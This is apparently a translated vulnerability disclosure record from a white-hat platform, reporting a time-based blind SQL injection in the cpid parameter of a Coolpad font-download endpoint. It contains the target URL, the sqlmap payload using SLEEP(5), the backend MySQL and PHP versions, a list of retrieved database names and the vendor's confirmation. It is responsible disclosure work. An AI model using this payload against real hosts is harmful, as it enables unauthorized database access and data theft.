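2015-01-10: Details reported to the vendor; awaiting vendor handling
2015-01-12: Vendor confirmed; details disclosed only to the vendor
2015-01-22: Details disclosed to core white hats and experts in relevant fields
2015-02-01: Details disclosed to regular white hats
2015-02-11: Details disclosed to trainee white hats
2015-02-24: Details disclosed to the public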
Injection at a Coolpad endpoint (2)
http://coolshow.coolyun.com/service/fontdl.php?channel=0&cpid=2928925714&id=2928925714&type=0
The cpid parameter
sqlmap identified the following injection points with a total of 103 HTTP(s) requests:
---
Place: GET
Parameter: cpid
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: channel=0&cpid=2928925714' AND SLEEP(5) AND 'hbrz'='hbrz&id=2928925714&type=0
---
[20:51:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0.11
Databases
[20:52:11] [INFO] retrieved: information_schema
[20:54:06] [INFO] retrieved: db_yl_androidesk
[20:55:50] [INFO] retrieved: db_yl_elflockscreen
[20:59:17] [INFO] retrieved: db_yl_keyguard
[21:01:43] [INFO] retrieved: db_yl_themes
[21:04:32] [INFO] retrieved: db_yl_themes_records
[21:10:00] [INFO] retrieved: db_yl_widget_image
[21:15:30] [INFO] retrieved: db_yl_widget_records
...
..
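Severity: High
Vulnerability Rank: 15
Confirmed: 2015-01-12 15:42
Thanks for the report; it has been submitted to the business department for urgent handling.
None yet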